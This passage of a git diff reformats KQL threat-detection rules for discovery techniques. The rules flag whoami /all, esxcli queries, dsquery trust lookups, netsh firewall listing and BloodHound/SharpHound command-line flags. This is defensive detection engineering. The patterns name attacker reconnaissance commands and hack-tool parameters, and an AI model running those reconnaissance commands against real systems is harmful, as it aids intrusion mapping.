where ProcessCommandLine contains " -l" and FolderPath endswith "/crontab" \ No newline at end of file diff --git a/KQL/rules/Discovery/detected_windows_software_discovery.kql b/KQL/rules/Discovery/detected_windows_software_discovery.kql index 5b796643..7ddb7276 100644 --- a/KQL/rules/Discovery/detected_windows_software_discovery.kql +++ b/KQL/rules/Discovery/detected_windows_software_discovery.kql @@ -1,12 +1,12 @@ -// Title: Detected Windows Software Discovery -// Author: Nikita Nazarov, oscd.community -// Date: 2020-10-16 -// Level: medium -// Description: Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1518 -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: Detected Windows Software Discovery +// Author: Nikita Nazarov, oscd.community +// Date: 2020-10-16 +// Level: medium +// Description: Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1518 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where (ProcessCommandLine contains "query" and ProcessCommandLine contains "\\software\\" and ProcessCommandLine contains "/v" and ProcessCommandLine contains "svcversion") and FolderPath endswith "\\reg.exe" \ No newline at end of file diff --git a/KQL/rules/Discovery/dirlister_execution.kql b/KQL/rules/Discovery/dirlister_execution.kql index db43c8f5..4129cbf9 100644 --- a/KQL/rules/Discovery/dirlister_execution.kql +++ b/KQL/rules/Discovery/dirlister_execution.kql @@ -1,12 +1,12 @@ -// Title: DirLister Execution -// Author: frack113 -// Date: 2022-08-20 -// Level: low -// Description: Detect the usage of "DirLister.exe" a utility for quickly listing folder or drive contents. It was seen used by BlackCat ransomware to create a list of accessible directories and files. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1083 -// False Positives: -// - Legitimate use by users - -DeviceProcessEvents +// Title: DirLister Execution +// Author: frack113 +// Date: 2022-08-20 +// Level: low +// Description: Detect the usage of "DirLister.exe" a utility for quickly listing folder or drive contents. It was seen used by BlackCat ransomware to create a list of accessible directories and files. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1083 +// False Positives: +// - Legitimate use by users + +DeviceProcessEvents | where ProcessVersionInfoOriginalFileName =~ "DirLister.exe" or FolderPath endswith "\\dirlister.exe" \ No newline at end of file diff --git a/KQL/rules/Discovery/discovery_of_a_system_time.kql b/KQL/rules/Discovery/discovery_of_a_system_time.kql index f7f0f43d..6507ec7c 100644 --- a/KQL/rules/Discovery/discovery_of_a_system_time.kql +++ b/KQL/rules/Discovery/discovery_of_a_system_time.kql @@ -1,12 +1,12 @@ -// Title: Discovery of a System Time -// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community -// Date: 2019-10-24 -// Level: low -// Description: Identifies use of various commands to query a systems time. This technique may be used before executing a scheduled task or to discover the time zone of a target system. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1124 -// False Positives: -// - Legitimate use of the system utilities to discover system time for legitimate reason - -DeviceProcessEvents +// Title: Discovery of a System Time +// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community +// Date: 2019-10-24 +// Level: low +// Description: Identifies use of various commands to query a systems time. This technique may be used before executing a scheduled task or to discover the time zone of a target system. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1124 +// False Positives: +// - Legitimate use of the system utilities to discover system time for legitimate reason + +DeviceProcessEvents | where (ProcessCommandLine contains "time" and (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe")) or (ProcessCommandLine contains "tz" and FolderPath endswith "\\w32tm.exe") \ No newline at end of file diff --git a/KQL/rules/Discovery/docker_container_discovery_via_dockerenv_listing.kql b/KQL/rules/Discovery/docker_container_discovery_via_dockerenv_listing.kql index 7b0c1a73..e69d3819 100644 --- a/KQL/rules/Discovery/docker_container_discovery_via_dockerenv_listing.kql +++ b/KQL/rules/Discovery/docker_container_discovery_via_dockerenv_listing.kql @@ -1,13 +1,13 @@ -// Title: Docker Container Discovery Via Dockerenv Listing -// Author: Seth Hanford -// Date: 2023-08-23 -// Level: low -// Description: Detects listing or file reading of ".dockerenv" which can be a sing of potential container discovery -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1082 -// False Positives: -// - Legitimate system administrator usage of these commands -// - Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered - -DeviceProcessEvents +// Title: Docker Container Discovery Via Dockerenv Listing +// Author: Seth Hanford +// Date: 2023-08-23 +// Level: low +// Description: Detects listing or file reading of ".dockerenv" which can be a sing of potential container discovery +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1082 +// False Positives: +// - Legitimate system administrator usage of these commands +// - Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered + +DeviceProcessEvents | where ProcessCommandLine endswith ".dockerenv" and (FolderPath endswith "/cat" or FolderPath endswith "/dir" or FolderPath endswith "/find" or FolderPath endswith "/ls" or FolderPath endswith "/stat" or FolderPath endswith "/test" or FolderPath endswith "grep") \ No newline at end of file diff --git a/KQL/rules/Discovery/domain_trust_discovery_via_dsquery.kql b/KQL/rules/Discovery/domain_trust_discovery_via_dsquery.kql index ca6a57b8..e0fdf059 100644 --- a/KQL/rules/Discovery/domain_trust_discovery_via_dsquery.kql +++ b/KQL/rules/Discovery/domain_trust_discovery_via_dsquery.kql @@ -1,12 +1,12 @@ -// Title: Domain Trust Discovery Via Dsquery -// Author: E.M. Anhaus, Tony Lambert, oscd.community, omkar72 -// Date: 2019-10-24 -// Level: medium -// Description: Detects execution of "dsquery.exe" for domain trust discovery -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1482 -// False Positives: -// - Legitimate use of the utilities by legitimate user for legitimate reason - -DeviceProcessEvents +// Title: Domain Trust Discovery Via Dsquery +// Author: E.M. Anhaus, Tony Lambert, oscd.community, omkar72 +// Date: 2019-10-24 +// Level: medium +// Description: Detects execution of "dsquery.exe" for domain trust discovery +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1482 +// False Positives: +// - Legitimate use of the utilities by legitimate user for legitimate reason + +DeviceProcessEvents | where ProcessCommandLine contains "trustedDomain" and (FolderPath endswith "\\dsquery.exe" or ProcessVersionInfoOriginalFileName =~ "dsquery.exe") \ No newline at end of file diff --git a/KQL/rules/Discovery/driverquery_exe_execution.kql b/KQL/rules/Discovery/driverquery_exe_execution.kql index 7b80e2e6..30e251e4 100644 --- a/KQL/rules/Discovery/driverquery_exe_execution.kql +++ b/KQL/rules/Discovery/driverquery_exe_execution.kql @@ -1,12 +1,12 @@ -// Title: DriverQuery.EXE Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-01-19 -// Level: medium -// Description: Detect usage of the "driverquery" utility. Which can be used to perform reconnaissance on installed drivers -// MITRE Tactic: Discovery -// Tags: attack.discovery -// False Positives: -// - Legitimate use by third party tools in order to investigate installed drivers - -DeviceProcessEvents +// Title: DriverQuery.EXE Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-19 +// Level: medium +// Description: Detect usage of the "driverquery" utility. Which can be used to perform reconnaissance on installed drivers +// MITRE Tactic: Discovery +// Tags: attack.discovery +// False Positives: +// - Legitimate use by third party tools in order to investigate installed drivers + +DeviceProcessEvents | where (FolderPath endswith "driverquery.exe" or ProcessVersionInfoOriginalFileName =~ "drvqry.exe") and (not(((InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\" or InitiatingProcessFolderPath contains "\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Windows\\Temp\\")))) \ No newline at end of file diff --git a/KQL/rules/Discovery/enumerate_all_information_with_whoami_exe.kql b/KQL/rules/Discovery/enumerate_all_information_with_whoami_exe.kql index c1fbed8e..f9ae9080 100644 --- a/KQL/rules/Discovery/enumerate_all_information_with_whoami_exe.kql +++ b/KQL/rules/Discovery/enumerate_all_information_with_whoami_exe.kql @@ -1,10 +1,10 @@ -// Title: Enumerate All Information With Whoami.EXE -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-12-04 -// Level: medium -// Description: Detects the execution of "whoami.exe" with the "/all" flag -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1033, car.2016-03-001 - -DeviceProcessEvents +// Title: Enumerate All Information With Whoami.EXE +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-12-04 +// Level: medium +// Description: Detects the execution of "whoami.exe" with the "/all" flag +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1033, car.2016-03-001 + +DeviceProcessEvents | where (ProcessCommandLine contains " -all" or ProcessCommandLine contains " /all" or ProcessCommandLine contains " –all" or ProcessCommandLine contains " —all" or ProcessCommandLine contains " ―all") and (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe") \ No newline at end of file diff --git a/KQL/rules/Discovery/esxi_network_configuration_discovery_via_esxcli.kql b/KQL/rules/Discovery/esxi_network_configuration_discovery_via_esxcli.kql index 7ad955ff..69d9da04 100644 --- a/KQL/rules/Discovery/esxi_network_configuration_discovery_via_esxcli.kql +++ b/KQL/rules/Discovery/esxi_network_configuration_discovery_via_esxcli.kql @@ -1,12 +1,12 @@ -// Title: ESXi Network Configuration Discovery Via ESXCLI -// Author: Cedric Maurugeon -// Date: 2023-09-04 -// Level: medium -// Description: Detects execution of the "esxcli" command with the "network" flag in order to retrieve information about the network configuration. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.execution, attack.t1033, attack.t1007, attack.t1059.012 -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: ESXi Network Configuration Discovery Via ESXCLI +// Author: Cedric Maurugeon +// Date: 2023-09-04 +// Level: medium +// Description: Detects execution of the "esxcli" command with the "network" flag in order to retrieve information about the network configuration. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.execution, attack.t1033, attack.t1007, attack.t1059.012 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where (ProcessCommandLine contains " get" or ProcessCommandLine contains " list") and (ProcessCommandLine contains "network" and FolderPath endswith "/esxcli") \ No newline at end of file diff --git a/KQL/rules/Discovery/esxi_storage_information_discovery_via_esxcli.kql b/KQL/rules/Discovery/esxi_storage_information_discovery_via_esxcli.kql index 0a0a16b8..c4ad39af 100644 --- a/KQL/rules/Discovery/esxi_storage_information_discovery_via_esxcli.kql +++ b/KQL/rules/Discovery/esxi_storage_information_discovery_via_esxcli.kql @@ -1,12 +1,12 @@ -// Title: ESXi Storage Information Discovery Via ESXCLI -// Author: Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon -// Date: 2023-09-04 -// Level: medium -// Description: Detects execution of the "esxcli" command with the "storage" flag in order to retrieve information about the storage status and other related information. Seen used by malware such as DarkSide and LockBit. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.execution, attack.t1033, attack.t1007, attack.t1059.012 -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: ESXi Storage Information Discovery Via ESXCLI +// Author: Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon +// Date: 2023-09-04 +// Level: medium +// Description: Detects execution of the "esxcli" command with the "storage" flag in order to retrieve information about the storage status and other related information. Seen used by malware such as DarkSide and LockBit. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.execution, attack.t1033, attack.t1007, attack.t1059.012 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where (ProcessCommandLine contains " get" or ProcessCommandLine contains " list") and (ProcessCommandLine contains "storage" and FolderPath endswith "/esxcli") \ No newline at end of file diff --git a/KQL/rules/Discovery/esxi_system_information_discovery_via_esxcli.kql b/KQL/rules/Discovery/esxi_system_information_discovery_via_esxcli.kql index c1e30e5f..a65b97ae 100644 --- a/KQL/rules/Discovery/esxi_system_information_discovery_via_esxcli.kql +++ b/KQL/rules/Discovery/esxi_system_information_discovery_via_esxcli.kql @@ -1,12 +1,12 @@ -// Title: ESXi System Information Discovery Via ESXCLI -// Author: Cedric Maurugeon -// Date: 2023-09-04 -// Level: medium -// Description: Detects execution of the "esxcli" command with the "system" flag in order to retrieve information about the different component of the system. Such as accounts, modules, NTP, etc. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.execution, attack.t1033, attack.t1007, attack.t1059.012 -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: ESXi System Information Discovery Via ESXCLI +// Author: Cedric Maurugeon +// Date: 2023-09-04 +// Level: medium +// Description: Detects execution of the "esxcli" command with the "system" flag in order to retrieve information about the different component of the system. Such as accounts, modules, NTP, etc. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.execution, attack.t1033, attack.t1007, attack.t1059.012 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where (ProcessCommandLine contains " get" or ProcessCommandLine contains " list") and (ProcessCommandLine contains "system" and FolderPath endswith "/esxcli") \ No newline at end of file diff --git a/KQL/rules/Discovery/esxi_vm_list_discovery_via_esxcli.kql b/KQL/rules/Discovery/esxi_vm_list_discovery_via_esxcli.kql index b5c6d21d..3d941723 100644 --- a/KQL/rules/Discovery/esxi_vm_list_discovery_via_esxcli.kql +++ b/KQL/rules/Discovery/esxi_vm_list_discovery_via_esxcli.kql @@ -1,12 +1,12 @@ -// Title: ESXi VM List Discovery Via ESXCLI -// Author: Cedric Maurugeon -// Date: 2023-09-04 -// Level: medium -// Description: Detects execution of the "esxcli" command with the "vm" flag in order to retrieve information about the installed VMs. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.execution, attack.t1033, attack.t1007, attack.t1059.012 -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: ESXi VM List Discovery Via ESXCLI +// Author: Cedric Maurugeon +// Date: 2023-09-04 +// Level: medium +// Description: Detects execution of the "esxcli" command with the "vm" flag in order to retrieve information about the installed VMs. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.execution, attack.t1033, attack.t1007, attack.t1059.012 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where ProcessCommandLine contains "vm process" and ProcessCommandLine endswith " list" and FolderPath endswith "/esxcli" \ No newline at end of file diff --git a/KQL/rules/Discovery/esxi_vsan_information_discovery_via_esxcli.kql b/KQL/rules/Discovery/esxi_vsan_information_discovery_via_esxcli.kql index 6c395381..ee53f7c0 100644 --- a/KQL/rules/Discovery/esxi_vsan_information_discovery_via_esxcli.kql +++ b/KQL/rules/Discovery/esxi_vsan_information_discovery_via_esxcli.kql @@ -1,12 +1,12 @@ -// Title: ESXi VSAN Information Discovery Via ESXCLI -// Author: Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon -// Date: 2023-09-04 -// Level: medium -// Description: Detects execution of the "esxcli" command with the "vsan" flag in order to retrieve information about virtual storage. Seen used by malware such as DarkSide. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.execution, attack.t1033, attack.t1007, attack.t1059.012 -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: ESXi VSAN Information Discovery Via ESXCLI +// Author: Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon +// Date: 2023-09-04 +// Level: medium +// Description: Detects execution of the "esxcli" command with the "vsan" flag in order to retrieve information about virtual storage. Seen used by malware such as DarkSide. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.execution, attack.t1033, attack.t1007, attack.t1059.012 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where (ProcessCommandLine contains " get" or ProcessCommandLine contains " list") and (ProcessCommandLine contains "vsan" and FolderPath endswith "/esxcli") \ No newline at end of file diff --git a/KQL/rules/Discovery/file_and_directory_discovery_linux.kql b/KQL/rules/Discovery/file_and_directory_discovery_linux.kql index b549c73f..4877e734 100644 --- a/KQL/rules/Discovery/file_and_directory_discovery_linux.kql +++ b/KQL/rules/Discovery/file_and_directory_discovery_linux.kql @@ -1,12 +1,12 @@ -// Title: File and Directory Discovery - Linux -// Author: Daniil Yugoslavskiy, oscd.community, CheraghiMilad -// Date: 2020-10-19 -// Level: informational -// Description: Detects usage of system utilities such as "find", "tree", "findmnt", etc, to discover files, directories and network shares. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1083 -// False Positives: -// - Legitimate activities - -DeviceProcessEvents +// Title: File and Directory Discovery - Linux +// Author: Daniil Yugoslavskiy, oscd.community, CheraghiMilad +// Date: 2020-10-19 +// Level: informational +// Description: Detects usage of system utilities such as "find", "tree", "findmnt", etc, to discover files, directories and network shares. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1083 +// False Positives: +// - Legitimate activities + +DeviceProcessEvents | where (ProcessCommandLine matches regex "(.){200,}" and FolderPath endswith "/file") or FolderPath endswith "/find" or FolderPath endswith "/findmnt" or FolderPath endswith "/mlocate" or (ProcessCommandLine contains "-R" and FolderPath endswith "/ls") or FolderPath endswith "/tree" \ No newline at end of file diff --git a/KQL/rules/Discovery/file_and_directory_discovery_macos.kql b/KQL/rules/Discovery/file_and_directory_discovery_macos.kql index 86fe2a14..05454ab1 100644 --- a/KQL/rules/Discovery/file_and_directory_discovery_macos.kql +++ b/KQL/rules/Discovery/file_and_directory_discovery_macos.kql @@ -1,12 +1,12 @@ -// Title: File and Directory Discovery - MacOS -// Author: Daniil Yugoslavskiy, oscd.community -// Date: 2020-10-19 -// Level: informational -// Description: Detects usage of system utilities to discover files and directories -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1083 -// False Positives: -// - Legitimate activities - -DeviceProcessEvents +// Title: File and Directory Discovery - MacOS +// Author: Daniil Yugoslavskiy, oscd.community +// Date: 2020-10-19 +// Level: informational +// Description: Detects usage of system utilities to discover files and directories +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1083 +// False Positives: +// - Legitimate activities + +DeviceProcessEvents | where (ProcessCommandLine matches regex "(.){200,}" and FolderPath =~ "/usr/bin/file") or FolderPath =~ "/usr/bin/find" or FolderPath =~ "/usr/bin/mdfind" or (ProcessCommandLine contains "-R" and FolderPath =~ "/bin/ls") or FolderPath =~ "/tree" \ No newline at end of file diff --git a/KQL/rules/Discovery/file_and_subfolder_enumeration_via_dir_command.kql b/KQL/rules/Discovery/file_and_subfolder_enumeration_via_dir_command.kql index a23b223f..a359dd25 100644 --- a/KQL/rules/Discovery/file_and_subfolder_enumeration_via_dir_command.kql +++ b/KQL/rules/Discovery/file_and_subfolder_enumeration_via_dir_command.kql @@ -1,12 +1,12 @@ -// Title: File And SubFolder Enumeration Via Dir Command -// Author: frack113 -// Date: 2021-12-13 -// Level: low -// Description: Detects usage of the "dir" command part of Windows CMD with the "/S" command line flag in order to enumerate files in a specified directory and all subdirectories. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1217 -// False Positives: -// - Likely - -DeviceProcessEvents +// Title: File And SubFolder Enumeration Via Dir Command +// Author: frack113 +// Date: 2021-12-13 +// Level: low +// Description: Detects usage of the "dir" command part of Windows CMD with the "/S" command line flag in order to enumerate files in a specified directory and all subdirectories. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1217 +// False Positives: +// - Likely + +DeviceProcessEvents | where (ProcessCommandLine =~ "*dir*-s*" or ProcessCommandLine =~ "*dir*/s*" or ProcessCommandLine =~ "*dir*–s*" or ProcessCommandLine =~ "*dir*—s*" or ProcessCommandLine =~ "*dir*―s*") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") \ No newline at end of file diff --git a/KQL/rules/Discovery/file_explorer_folder_opened_using_explorer_folder_shortcut_via_shell.kql b/KQL/rules/Discovery/file_explorer_folder_opened_using_explorer_folder_shortcut_via_shell.kql index 2d05a0d3..557b39cc 100644 --- a/KQL/rules/Discovery/file_explorer_folder_opened_using_explorer_folder_shortcut_via_shell.kql +++ b/KQL/rules/Discovery/file_explorer_folder_opened_using_explorer_folder_shortcut_via_shell.kql @@ -1,10 +1,10 @@ -// Title: File Explorer Folder Opened Using Explorer Folder Shortcut Via Shell -// Author: @Kostastsale -// Date: 2022-12-22 -// Level: high -// Description: Detects the initial execution of "cmd.exe" which spawns "explorer.exe" with the appropriate command line arguments for opening the "My Computer" folder. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1135 - -DeviceProcessEvents +// Title: File Explorer Folder Opened Using Explorer Folder Shortcut Via Shell +// Author: @Kostastsale +// Date: 2022-12-22 +// Level: high +// Description: Detects the initial execution of "cmd.exe" which spawns "explorer.exe" with the appropriate command line arguments for opening the "My Computer" folder. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1135 + +DeviceProcessEvents | where ProcessCommandLine contains "shell:mycomputerfolder" and FolderPath endswith "\\explorer.exe" and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") \ No newline at end of file diff --git a/KQL/rules/Discovery/firewall_configuration_discovery_via_netsh_exe.kql b/KQL/rules/Discovery/firewall_configuration_discovery_via_netsh_exe.kql index 5e764c85..5d1c1c84 100644 --- a/KQL/rules/Discovery/firewall_configuration_discovery_via_netsh_exe.kql +++ b/KQL/rules/Discovery/firewall_configuration_discovery_via_netsh_exe.kql @@ -1,12 +1,12 @@ -// Title: Firewall Configuration Discovery Via Netsh.EXE -// Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io' -// Date: 2021-12-07 -// Level: low -// Description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1016 -// False Positives: -// - Administrative activity - -DeviceProcessEvents +// Title: Firewall Configuration Discovery Via Netsh.EXE +// Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io' +// Date: 2021-12-07 +// Level: low +// Description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1016 +// False Positives: +// - Administrative activity + +DeviceProcessEvents | where ((ProcessCommandLine contains "config " or ProcessCommandLine contains "state " or ProcessCommandLine contains "rule " or ProcessCommandLine contains "name=all") and (ProcessCommandLine contains "netsh" and ProcessCommandLine contains "show " and ProcessCommandLine contains "firewall ")) and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") \ No newline at end of file diff --git a/KQL/rules/Discovery/fsutil_drive_enumeration.kql b/KQL/rules/Discovery/fsutil_drive_enumeration.kql index 93fb63d7..8031cc61 100644 --- a/KQL/rules/Discovery/fsutil_drive_enumeration.kql +++ b/KQL/rules/Discovery/fsutil_drive_enumeration.kql @@ -1,12 +1,12 @@ -// Title: Fsutil Drive Enumeration -// Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io' -// Date: 2022-03-29 -// Level: low -// Description: Attackers may leverage fsutil to enumerated connected drives. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1120 -// False Positives: -// - Certain software or administrative tasks may trigger false positives. - -DeviceProcessEvents +// Title: Fsutil Drive Enumeration +// Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io' +// Date: 2022-03-29 +// Level: low +// Description: Attackers may leverage fsutil to enumerated connected drives. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1120 +// False Positives: +// - Certain software or administrative tasks may trigger false positives. + +DeviceProcessEvents | where ProcessCommandLine contains "drives" and (FolderPath endswith "\\fsutil.exe" or ProcessVersionInfoOriginalFileName =~ "fsutil.exe") \ No newline at end of file diff --git a/KQL/rules/Discovery/gathernetworkinfo_vbs_reconnaissance_script_output.kql b/KQL/rules/Discovery/gathernetworkinfo_vbs_reconnaissance_script_output.kql index 0e070409..abb5b837 100644 --- a/KQL/rules/Discovery/gathernetworkinfo_vbs_reconnaissance_script_output.kql +++ b/KQL/rules/Discovery/gathernetworkinfo_vbs_reconnaissance_script_output.kql @@ -1,10 +1,10 @@ -// Title: GatherNetworkInfo.VBS Reconnaissance Script Output -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-02-08 -// Level: medium -// Description: Detects creation of files which are the results of executing the built-in reconnaissance script "C:\Windows\System32\gatherNetworkInfo.vbs". -// MITRE Tactic: Discovery -// Tags: attack.discovery - -DeviceFileEvents +// Title: GatherNetworkInfo.VBS Reconnaissance Script Output +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-08 +// Level: medium +// Description: Detects creation of files which are the results of executing the built-in reconnaissance script "C:\Windows\System32\gatherNetworkInfo.vbs". +// MITRE Tactic: Discovery +// Tags: attack.discovery + +DeviceFileEvents | where (FolderPath endswith "\\Hotfixinfo.txt" or FolderPath endswith "\\netiostate.txt" or FolderPath endswith "\\sysportslog.txt" or FolderPath endswith "\\VmSwitchLog.evtx") and FolderPath startswith "C:\\Windows\\System32\\config" \ No newline at end of file diff --git a/KQL/rules/Discovery/gpresult_display_group_policy_information.kql b/KQL/rules/Discovery/gpresult_display_group_policy_information.kql index 24b11f4e..13b61f03 100644 --- a/KQL/rules/Discovery/gpresult_display_group_policy_information.kql +++ b/KQL/rules/Discovery/gpresult_display_group_policy_information.kql @@ -1,10 +1,10 @@ -// Title: Gpresult Display Group Policy Information -// Author: frack113 -// Date: 2022-05-01 -// Level: medium -// Description: Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1615 - -DeviceProcessEvents +// Title: Gpresult Display Group Policy Information +// Author: frack113 +// Date: 2022-05-01 +// Level: medium +// Description: Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1615 + +DeviceProcessEvents | where (ProcessCommandLine contains "/z" or ProcessCommandLine contains "/v") and FolderPath endswith "\\gpresult.exe" \ No newline at end of file diff --git a/KQL/rules/Discovery/group_membership_reconnaissance_via_whoami_exe.kql b/KQL/rules/Discovery/group_membership_reconnaissance_via_whoami_exe.kql index c3ec9a4d..fae44daf 100644 --- a/KQL/rules/Discovery/group_membership_reconnaissance_via_whoami_exe.kql +++ b/KQL/rules/Discovery/group_membership_reconnaissance_via_whoami_exe.kql @@ -1,10 +1,10 @@ -// Title: Group Membership Reconnaissance Via Whoami.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-02-28 -// Level: medium -// Description: Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1033 - -DeviceProcessEvents +// Title: Group Membership Reconnaissance Via Whoami.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-28 +// Level: medium +// Description: Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1033 + +DeviceProcessEvents | where (ProcessCommandLine contains " /groups" or ProcessCommandLine contains " -groups") and (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe") \ No newline at end of file diff --git a/KQL/rules/Discovery/hacktool_bloodhound_sharphound_execution.kql b/KQL/rules/Discovery/hacktool_bloodhound_sharphound_execution.kql index 986fc84f..2b40985d 100644 --- a/KQL/rules/Discovery/hacktool_bloodhound_sharphound_execution.kql +++ b/KQL/rules/Discovery/hacktool_bloodhound_sharphound_execution.kql @@ -1,12 +1,12 @@ -// Title: HackTool - Bloodhound/Sharphound Execution -// Author: Florian Roth (Nextron Systems) -// Date: 2019-12-20 -// Level: high -// Description: Detects command line parameters used by Bloodhound and Sharphound hack tools -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1087.001, attack.t1087.002, attack.t1482, attack.t1069.001, attack.t1069.002, attack.execution, attack.t1059.001 -// False Positives: -// - Other programs that use these command line option and accepts an 'All' parameter - -DeviceProcessEvents +// Title: HackTool - Bloodhound/Sharphound Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2019-12-20 +// Level: high +// Description: Detects command line parameters used by Bloodhound and Sharphound hack tools +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1087.001, attack.t1087.002, attack.t1482, attack.t1069.001, attack.t1069.002, attack.execution, attack.t1059.001 +// False Positives: +// - Other programs that use these command line option and accepts an 'All' parameter + +DeviceProcessEvents | where (ProcessCommandLine contains " -CollectionMethod All " or ProcessCommandLine contains " --CollectionMethods Session " or ProcessCommandLine contains " --Loop --Loopduration " or ProcessCommandLine contains " --PortScanTimeout " or ProcessCommandLine contains ".exe -c All -d " or ProcessCommandLine contains "Invoke-Bloodhound" or ProcessCommandLine contains "Get-BloodHoundData") or (ProcessCommandLine contains " -JsonFolder " and ProcessCommandLine contains " -ZipFileName ") or (ProcessCommandLine contains " DCOnly " and ProcessCommandLine contains " --NoSaveCache ") or (ProcessVersionInfoProductName contains "SharpHound" or ProcessVersionInfoFileDescription contains "SharpHound" or (ProcessVersionInfoCompanyName contains "SpecterOps" or ProcessVersionInfoCompanyName contains "evil corp") or (FolderPath contains "\\Bloodhound.exe" or FolderPath contains "\\SharpHound.exe")) \ No newline at end of file diff --git a/KQL/rules/Discovery/hacktool_certify_execution.kql b/KQL/rules/Discovery/hacktool_certify_execution.kql index 86ad786b..d76e0175 100644 --- 